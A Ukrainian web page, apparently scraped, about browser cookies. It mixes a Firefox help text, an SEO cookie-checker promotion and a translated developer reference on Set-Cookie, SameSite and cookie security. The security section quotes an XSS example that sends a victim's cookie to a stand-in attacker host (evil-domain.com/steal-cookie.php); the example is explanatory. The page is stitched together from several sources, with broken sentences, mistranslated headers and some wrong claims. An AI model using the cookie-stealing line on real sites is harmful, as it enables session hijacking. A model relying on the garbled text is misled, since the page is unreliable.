У цій статті описано, що таке "куки", як вони використовуються і як ви можете керувати куками, які зберігає Firefox. Cookies є інформацією, що зберігається на Вашому комп'ютері веб-сайтом, який Ви відвідуєте. Cookie часто зберігають ваші налаштування для веб-сайту, наприклад статус логіна і відданий мову або місцезнаходження. , що відповідає вашим потребам. Куки можуть зберігати широкий діапазон інформації, включаючи персональні дані (наприклад, Ваше ім'я, домашню адресу, адресу електронної пошти або номер телефону). отримати доступ до інформації, яку Ви їм не надали, і вони не можуть отримати доступ до інших файлів на Вашому комп'ютері. За промовчанням, дії для зберігання та надсилання куків для вас невидимі. Проте, Ви можете змінити налаштування Firefox, щоб дозволити Вам особисто схвалювати або відхиляти запити на збереження кук, автоматично видаляти збережені куки при закритті Firefox та багато іншого. Ви можете відкрити Налаштування вашого Firefox, щоб керувати cookie наступним чином: Налаштування куки під Поліпшений захист від відстеження і Куки та дані сайтів. Для отримання інструкцій про те, як керувати налаштуваннями кук для певних завдань, прочитайте: Якщо у Вас виникли проблеми з Firefox, що стосуються куки, прочитайте: Ці чудові люди допомогли написати цю статтю: Ростіть і ділитеся досвідом з іншими. Відповідайте на запитання та покращуйте нашу базу знань. Отримайте доступ до повного аудиту сайту, який включає понад 300 технічних аспектів. Безкоштовний інструмент для SEO перевірки та аудиту сайту Якщо ви власник веб-сайту, який цінує конфіденційність відвідувачів, ви, ймовірно, запитували себе: «Чи використовує мій веб-сайт файли cookie?» Якщо ви шукаєте інструмент для перевірки, читайте далі; ми розповімо все, що вам потрібно знати про інструменти перевірки файлів cookie. Почнемо з пояснення того, що таке файли cookie та як вони працюють. Найчастіше це файли cookie HTTP, також відомі як веб-файли
cookie або файли cookie браузера, на які посилається термін файли cookie.використовується у зв'язку з обслуговуванням веб-сайту (Chrome, Firefox тощо). Насправді це єдиний у своєму роді тег, який веб-сайти розміщують на комп'ютері користувача, щоб отримати уявлення про його моделі поведінки. У випадку, якщо користувач повертається на певну URL-адресу, файли cookie дозволяють веб-сайту «запам'ятати» цього користувача та надати йому інформацію, яка раніше вважалася цінною (логін, пароль тощо). Коли користувачі повертаються на веб-сайт, файли cookie використовуються для їх ідентифікації (аутентифікації) та відображення «персоналізованих» сторінок, адаптованих до їх конкретних вимог та інтересів. Файли cookie класифікуються за такими критеріями: Файли cookie необхідні за законом для правильної роботи веб-сайту — наприклад, файли cookie, які перевіряють, чи ви вже увійшли до системи. Необов'язкові файли cookie не потрібні для роботи веб-сайту. Вони часто вводяться веб-сайтом для надання нових функцій — наприклад, файли cookie, які дозволяють відображати рекламу, яку бачать на деяких веб-сайтах. Веб-сайт, який зараз переглядає користувач або знайшов, встановлює власні файли cookie. Вони надають такі послуги, як відстеження статусу входу в систему та збереження вмісту кошика покупок. Інші файли cookie — це файли, які розміщуються іншими веб-сайтами або сторонніми інструментами для відстеження поведінки користувача на цьому сайті. Наприклад, файли cookie Google Analytics перевіряють та перевіряють користувачів для вимірювання конверсій. Коли браузер закривається і сеанс завершується, термін дії файлів cookie сеансу закінчується. Сеансові файли cookie, наприклад, можуть перебувати на веб-сайті магазину та зберігати товари в кошику, навіть якщо користувач переходить на іншу сторінку. З іншого боку, постійні файли cookie , залишаються в браузері користувача протягом більш тривалого періоду часу і закінчуються лише при досягненні зазначеної ним дати закінчення терміну дії. На відміну від сеансових файлів cookie, постійні файли cookie зберігають продукти та статистику покупок в онлайн-кошику, коли користувач закриває браузер, дозволяючи отримати доступ до них при наступному відвідуванні. Перевірка файлів cookie – це інструмент, який надає детальну інформацію про всі файли cookie, збережені певним веб-сайтом під час вашого сеансу. Інструмент є ідентифікатором, який відображає файли cookie на екрані та перевіряє безпеку веб-сайту. Чи можна видалити куки з комп'ютера? Більшість сучасних браузерів дозволяють вибирати, приймати або відхиляти файли cookie, і ви можете видаляти файли cookie з меню «історія» вашого браузера після кожного сеансу онлайн. Зрештою, те, яким правилам ви дотримуєтеся, визначає дуже багато. У деяких випадках виявлення та видалення файлів cookie може ускладнити використання функцій веб-сайту, наприклад кошика покупок. Прийняття файлів cookie реєстратора в деяких ситуаціях дозволяє рекламодавцям стежити за поведінкою у своїх інтересах, а не в інтересах користувачів. Файли cookie призначені для того, щоб бути корисними, і вони використовуються частіше, ніж ви вважаєте. Ось кілька прикладів, коли файли cookie були збережені у вашій системі та повинні бути видалені. Покупки. Файли cookie допомагають розміщувати товари у віртуальному кошику покупок на сайтах роздрібної торгівлі. За допомогою файлів cookie ви можете переглядати веб-сайт, на якому відображаються товари, і в будь-який час додавати або видаляти їх зі свого кошика покупок. Реєстрація-up. Файли cookie полегшують вхід на веб-сайти. Коли ви входите на веб-сайт зі своїм ім'ям користувача та паролем, файли cookie допомагають попереджати веб-сайт про те, що ви вже авторизовані, дозволяючи вам виконувати дії, які можуть робити тільки зареєстровані клієнти (що увійшли до системи). Персоналізація. Веб-сайти також використовують файли cookie для персоналізації вмісту залежно від вибору користувача. Google, наприклад, дозволяє вибрати кількість записів на сторінці, яку ви бажаєте бачити. Дослідження та релевантність. Маркетологи та рекламодавці використовують файли cookie, щоб регулювати вашу поведінку в Інтернеті та передавати цю інформацію рекламодавцю. На основі цієї інформації рекламодавець може вибрати, який тип реклами показувати на веб-сторінці, поки ви знаходитесь в мережі. Не випадково реклама певної марки взуття або комп'ютера відображається на бічній панелі веб-сторінки після того, як ви її переглядаєте. Файли cookie використовуються з низки причин, але вони працюють однаково: Файли cookie HTTP В даний час використовуються для адміністрування роботи в Інтернеті. Деякі зловмисники можуть використовувати його для аналізу інтернет-активності та крадіжки особистої інформації. Відкрийте нове приватне вікно та вивчіть URL-адресу вашого веб-сайту. Запустіть програму Інструменти розробника. Це залежить від вашого браузера. Chrome: Перегляд > Розробник > Інструменти розробника або CMD+ALT+I на Mac або F12 на Windows. З Mozilla Firefox ви можете перевірити файли cookie та домени, на які вони надсилають дані. Відкрийте нове приватне вікно та вивчіть URL-адресу вашого веб-сайту. Запустіть програму Інструменти розробника. Натисніть CMD + ALT + I або F12 на Mac або ПК, щоб відкрити інспектор сховища Firefox. У Safari виконайте такі дії, щоб перевірити файли cookie та домени, на які вони надсилають дані: Відкрийте нове приватне вікно та вивчіть URL-адресу вашого веб-сайту. Запустіть програму Інструменти розробника. Натисніть CMD + ALT + I на Mac або F12 на ПК, щоб відкрити веб-інспектор Safari. Правильно налаштувати cookie це важливо, але не головне у вашому SEO! Проведіть повний аудит сайту, щоб перевірити інші технічні аспекти вашого SEO та виправити їх. Коли користувач відвідує веб-сайт, файли cookie зберігаються у його браузері та обробляють особисті дані, такі як IP-адреси, унікальні ідентифікатори, історію пошуку та історію переглядів. Це не тільки дозволяє веб-сайтам запам'ятовувати конкретних відвідувачів, коли вони повертаються, але також дозволяє іншим веб-сайтам і компаніям, що займаються рекламними технологіями, знаходити людей в Інтернеті. Сканер файлів cookie, що іноді називається засобом перевірки файлів cookie, є скануванням інструмент, який сканує веб-сайт на наявність файлів cookie і надає повний звіт про сканування файлів cookie. Він сканує веб-сайт, активує всі файли cookie та збирає всю необхідну інформацію про них. Це займає менше часу, ніж ручна перевірка файлів cookie у браузері. Замість перегляду інформації про кожен файл cookie ви можете отримати спрощений звіт. Інформація є повною і підходить для включення у ваші файли cookie або політику конфіденційності. Після того, як ви надасте URL-адресу, вона просканує сторінку та виявить файли cookie за лічені секунди. Потім він створить звіт про сканування, що містить інформацію про файли cookie, таку як їх ім'я, тип, опис (призначення), домен та тривалість. Ця інформація може бути передана користувачам вашого веб-сайту, що зробить вас на один крок ближче до дотримання вимог. Можливо! Дотримуючись цих простих процедур, можна швидко та просто дізнатися, які файли cookie може використовувати веб-сайт. (Примітка. Для цього рекомендується переглядати сайт у приватному режимі, оскільки це запобігає завантаженню файлів cookie з інших веб-сайтів. Крім того, переконайтеся, що у вашому браузері відключено блокування файлів cookie). Правильне керування файлами cookie веб-сайту є критично важливим аспектом забезпечення відповідності. HTTP cookie (web cookie, cookie браузера) - це невеликий фрагмент даних, який сервер надсилає браузеру користувача.Браузер може зберегти цей фрагмент у себе та відправляти на сервер з кожним наступним запитом. Це, зокрема, дозволяє дізнатися, чи з одного браузера надійшло кілька запитів (наприклад, для автентифікації користувача). За допомогою кук можна зберегти будь-яку інформацію про стан, HTTP-протокол сам собою цього робити не вміє. Куки часто використовуються для: Донедавна куки використовувалися як сховища інформації на стороні користувача. Це могло мати сенс без варіантів, але тепер, коли в розпорядженні браузерів з'явилися різні API для зберігання даних, це вже не так. Через те, що куки пересилаються з кожним запитом, вони можуть погіршувати продуктивність (особливо при використанні мобільних мереж). В якості сховищ даних на стороні користувача замість них можна використовувати Web storage API (localStorage та sessionStorage) та IndexedDB. Примітка: Щоб переглянути збережені куки та інші сховища даних, які використовує веб-сторінку, можна використовувати Storage Inspector (Інспектор сховища) в інструментах розробника. Отримавши HTTP-запит, разом із відповіддю сервер може надіслати заголовок Set-Cookie. Куки зазвичай запам'ятовуються браузером і надсилаються в HTTP-заголовку Cookie з кожним новим запитом до одного сервера. Можна задати термін дії кук, а також термін їхнього життя, після якого кукі не вирушатимуть. Також можна вказати обмеження на шлях і домен, тобто вказати, протягом якого часу і до якого сайту вони надсилатимуться. Заголовок Set-Cookie HTTP-відповіді використовується для надсилання cookie з сервера до клієнтської програми (браузер). Простий куки може задаватися так: Цей заголовок із сервера дає клієнту вказівку зберегти куки (це роблять, наприклад, PHP, Node.js, Python та Ruby on Rails). Відповідь, що надсилається браузеру, містить заголовок Set-Cookie і куки запам'ятовується браузером. Тепер з кожним новим запитом до сервера за допомогою заголовка Cookie браузер повертатиме серверу всі збережені раніше куки. Простий cookie, приклад якого наведений вище, є сесійним cookie (session cookie) - такі cookie видаляються під час закриття клієнта, тобто існують лише протягом поточного сеансу, оскільки атрибути Expires або Max-Age для нього не задаються. Однак, якщо у браузері включено автоматичне відновлення сеансу, що трапляється дуже часто, cookie сеансу може зберігатися постійно, начебто браузер ніколи не закривався. Постійні cookie (permanent cookies) видаляються не із закриттям клієнта, а при настанні певної дати (атрибут Expires) або після певного інтервалу часу (атрибут Max-Age). "Безпечні" (secure) куки надсилаються на сервер лише тоді, коли запит надсилається протоколом SSL і HTTPS.Однак важливі дані ніколи не слід передавати або зберігати в куках, оскільки сам їхній механізм дуже вразливий щодо безпеки, а прапор secure ніякого додаткового шифрування або засобів захисту не забезпечує. Починаючи з Chrome 52 і Firefox 52, незахищені сайти (http:) не можуть створювати куки з прапором Secure. Куки HTTPonly не доступні з JavaScript через властивості Document.cookie API, що допомагає уникнути міжсайтового скриптингу (XSS). Встановлюйте цей прапор для тих кук, до яких не потрібно звертатися через JavaScript. Зокрема, якщо куки використовуються тільки для підтримки сеансу, то JavaScript не потрібні, так що в цьому випадку слід встановлювати прапор HttpOnly . Директиви Domain і Path визначають область видимості куки, тобто URL-адреси, до яких куки будуть надсилатися. Атрибут Domain вказує хости, на які надсилаються куки. Якщо вона не задана, то за замовчуванням береться доменна частина адреси документа (але без піддоменів). Якщо домен вказано явно, піддомени завжди включені. Наприклад, якщо встановлено Domain=mozilla.org , то куки включені і в піддоменах, наприклад, в developer.mozilla.org . Атрибут Path вказує URL, який повинен бути в запитуваному ресурсі на момент надсилання заголовка Cookie. Символ %x2F ("/") інтерпретується як роздільник в URL-шляху, підшляхи також враховуватимуться. Якщо заданий Path=/docs , то збігатимуться такі пути: А ці шляхи збігатися не будуть: Куки відправляються на сервер за будь-яких запитів, навіть якщо запитується статичний ресурс з чужого сервера, тобто якщо відбувається міжсайтовий запит. Наприклад, якщо сторінка сайту site.com містить зображення сайту site.net, при запиті зображення у запиті будуть надіслані всі куки користувача для site.net. Щоб обмежити відправлення кук лише тому сайту, якому вони належать, використовують атрибут SameSite. За допомогою атрибуту SameSite можна вказати, коли і як надсилати куки з міжсайтовими запитами (де сайт визначається комбінацією домену та схеми http: або https: ). Деякою мірою цей атрибут захищає від міжсайтової підробки запиту (CSRF). SameSite може приймати три можливі значення: Strict, Lax і None. З атрибутом Strict кукі будуть надсилатися тільки тому сайту, якому ці куки належать. Атрибут Lax працює схоже, але кукі будуть відправлятися також при навігації на той сайт, якому належать куки. Наприклад, при переході на посилання із зовнішнього сайту. Атрибут None вимикає обмеження на відправлення кук для міжсайтових запитів, але тільки в безпечному контексті (тобто якщо встановлений SameSite=None, тоді також має бути встановлений атрибут Secure). Якщо атрибут SameSite не встановлено, cookie будуть сприйматися як Lax . Примітка: У таблиці сумісності можна знайти інформацію про те, як обробляються атрибути в конкретних версіях браузерів. Через дизайн механізму кук сервер не може підтвердити, що куки були відправлені із захищеного джерела (secure origin), або бути впевненим у тому, де саме вони були встановлені. Вразлива програма піддомену може встановити куку з атрибутом Domain , тим самим відкриваючи доступ до неї на всіх інших піддоменах. Цей механізм може експлуатуватися з атакою фіксація сесії. Примітка: Ознайомтеся зі статтею фіксації сесії, щоб дізнатися про основні методи захисту від цієї атаки. Тим не менш, відповідно до принципу захисту в глибину ви можете використовувати кукі з префіксами, щоб гарантувати специфічні факти про куки. Доступні два префікси: Якщо кука містить цей префікс, вона буде встановлена заголовком Set-Cookie тільки в тому випадку, якщо кука міститиме атрибут Secure і якщо запит буде надсилатися із захищеного джерела. Також кука не повинна включати атрибут Domain і містити атрибут Path зі значенням / . Якщо кука містить цей префікс, вона буде встановлена заголовком Set-Cookie тільки в тому випадку, якщо кука міститиме атрибут Secure і якщо запит буде надсилатися із захищеного джерела. Захист за допомогою цього префікса слабший у порівнянні з префіксом __Host-. Браузери будуть відхиляти встановлення цих кук, якщо вони не задовольнятимуть всі обмеження. Зауважте, що куки з префіксами, створені в рамках піддомену, обмежуватимуться лише ним або повністю ігноруватимуться. Оскільки бекенд перевіряє лише куки з заздалегідь відомими іменами при авторизації користувача або валідації CSRF-токена, куки з префіксами фактично працюють як захисний механізм від фіксації сесії. Примітка: Бекенд веб-додатки зобов'язаний звертатися за повним ім'ям куки, включаючи префікс. Користувальницькі агенти не видаляють префікс з імені кук перед їх відправкою в HTTP-заголовку Cookie. Щоб отримати інформацію про статус підтримки префіксів у різних браузерах, зверніться до статті про Set-Cookie. Cookie можна створювати за допомогою JavaScript, використовуючи DOM-властивість Document.cookie . Куки, створені за допомогою JavaScript, не можуть містити атрибуту HttpOnly . Будь ласка, враховуйте проблеми, про які йдеться в розділі Безпека, доступні для JavaScript, можуть бути викрадені за допомогою XSS. Примітка: При збереженні інформації в куках майте на увазі, що у всіх користувачів є можливість переглядати і змінювати їх значення. можливість використання альтернативних механізмів автентифікації та конфіденційності, наприклад, JSON Web Tokens Способи запобігання атакам, що використовують куки: Куки часто використовуються у веб-застосунках для ідентифікації автентифікованого користувача та сеансу роботи. Відповідно, викрадення кук із програми може призвести до захоплення авторизованого сеансу користувача. Крадіжка кук часто здійснюється за допомогою соціальної інженерії (Social Engineering) та використання вразливості XSS. У Wikipedia є добрий приклад CSRF. У повідомлення, наприклад, у чаті або на форумі, включають "зображення", яке, насправді, є запитом до сервера банку на зняття грошей: Якщо ви автентифіковані у своєму банківському обліковому записі, а куки, як і раніше, дійсні (і ніякої додаткової перевірки не потрібно), то при завантаженні HTML-документу форуму або чату з цим зображенням гроші будуть переведені з вашого рахунку. Для захисту від цього використовується низка методів: Куки асоціюються з певним доменом та схемою (такою як http: або https: ). Також вони можуть бути асоційовані з піддоменом за допомогою атрибуту Domain. Якщо домен і схема кук збігаються з доменом і схемою поточної сторінки, де ви знаходитесь, їх називають власними куками (first-party cookies). Якщо домен і схема кук відрізняється від домену і схеми поточної сторінки, такі куки називають сторонніми куками (third-party cookies). Сервер, що хость сторінку, встановлює власні куки, але на сторінці можуть знаходитись зображення та інші компоненти з інших доменів (наприклад, банерна реклама), вони в свою чергу можуть встановлювати сторонні куки. Сторонні куки часто використовуються для реклами та трекінгу користувачів у мережі. Як приклад, можете переглянути куки, які встановлює Google. Третя сторона, що контролює впровадження сторонніх кук, може створити профіль користувача на основі історії його відвідувань різних сайтів за допомогою кук, що надсилаються тим самим браузером з різних сайтів. Firefox за замовчуванням блокує сторонні куки, про які відомо, що вони використовуються для трекінгу користувачів. Сторонні куки (або просто кукі для трекінгу) можуть бути заблоковані іншими налаштуваннями браузера або розширеннями. Блокування кук у деяких ситуаціях може спричинити некоректну поведінку сторонніх компонентів, наприклад, віджетів соціальних мереж. Примітка: Бекенд може (і повинен) встановлювати у кук атрибут SameSite для керування відправкою кук на сторонні сервери. Регулюючі акти та законодавство, що покривають куки, включають: Ці акти та директиви діють глобально. Вони застосовуються до всіх сайтів у Всесвітній павутині, до яких користувачі з цих юрисдикцій отримують доступ (Європейський Союз та Каліфорнія, із застереженням, що Каліфорнійський закон застосовується до компаній з доходом понад 25 мільйонів доларів та кількома іншими застереженнями). Ці акти та директиви включають такі вимоги як: Можуть існувати інші законодавчі акти, які можуть бути застосовані до вашої локальної юрисдикції. На вас лежить відповідальність знати про них і слідувати їм. Існують компанії, які пропонують код з "кукі банером" і беруть на себе турботи про дотримання законодавства, пов'язаного з куками. Інший спосіб для зберігання даних у браузері - Web Storage API. Властивості window.sessionStorage і window.localStorage подібні до сесійних і постійних куків, але дозволяють зберігати більше даних і ніколи не відправляються на сервер. Для зберігання ще більшого обсягу структурованих даних може використовуватися IndexedDB API або бібліотеки, побудовані поверх нього. Існують техніки для повторного встановлення кук після їх видалення. Такі куки називаються кукі-зомбі.Ці техніки порушують принципи приватності користувачів та контролю користувача і можуть порушувати законодавства, що регулюють приватність даних, відповідно, сайт, що їх використовує, піддається судовому розгляду.Кукі - інформація, яку веб-сайти зберігають на вашому комп'ютері
Зміст
Що таке кукі?
Налаштування куки
Усунення проблем з куки
Стати волонтером
Website Cookie Checker
Що таке файл cookie
пошук?
Що таке засіб перевірки файлів cookie?
Використання інструменту перевірки файлів cookie (як використовувати)
Крок 1. Вставте URL-адресу
Коли адреса буде додана в засіб перевірки файлів cookie, ви отримаєте результат, аналогічний показаному нижче.Крок 2. Інтерпретація результатів інструмента перевірки файлів cookie
Випадки, коли потрібна перевірка файлів cookie
Різні типи файлів cookie
Інші способи перевірки файлів cookie
Google Chrome:
Firefox:
Сафарі:
Що таке файли cookie на веб-сайті?
Сторонні файли cookie будуть встановлені відповідно до законодавства на вашому веб-сайті, якщо ви використовуєте плагіни соціальних мереж, інструменти аналізу або маркетингове програмне забезпечення. Усі файли cookie, які не обов'язково є законними для основних функцій вашого веб-сайту, повинні бути відключені доти, доки користувачі не дадуть згоди на їх активацію.Як перевірити файли cookie?
Чи використовує мій веб-сайт файли cookie?
HTTP-кукі
Створення кукі
Заголовки Set-Cookie та Cookie
HTTP/1.0 200 OK Назад-тип: text/html Set-Cookie: yummy_cookie=choco Set-Cookie: tasty_cookie=strawberry [page content]
GET /sample_page.html HTTP/1.1 Host: www.example.org Cookie: yummy_cookie=choco; tasty_cookie=strawberry
Сесійні cookie
Постійні cookies
Set-Cookie: Expires=Wed, 21 Oct 2015 07:28:00 GMT;
Secure ("безпечні") і HttpOnly куки
Set-Cookie: Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly
Область видимості куки
Атрибут Domain
Атрибут Path
Куки SameSite
Set-Cookie: mykey = myvalue; SameSite=Strict
Куки з префіксами
Доступ до JavaScript за допомогою Document.cookie
document.cookie = "yummy_cookie=choco"; document.cookie = "tasty_cookie=strawberry"; console.log(document.cookie);
Безпека
Захоплення сесії (session hijacking) та XSS
new Image().src = "http://www.evil-domain.com/steal-cookie.php?cookie міжсайтова_підробка_запиту_csrf_-_cross-site_request_forgery">Міжсайтова підробка запиту (CSRF - Cross-site request forgery)
Трекінг та приватність
Сторонні (Third-party) куки
Законодавство, пов'язане з куки
Інші способи зберігання інформації у браузері
Дивіться також
html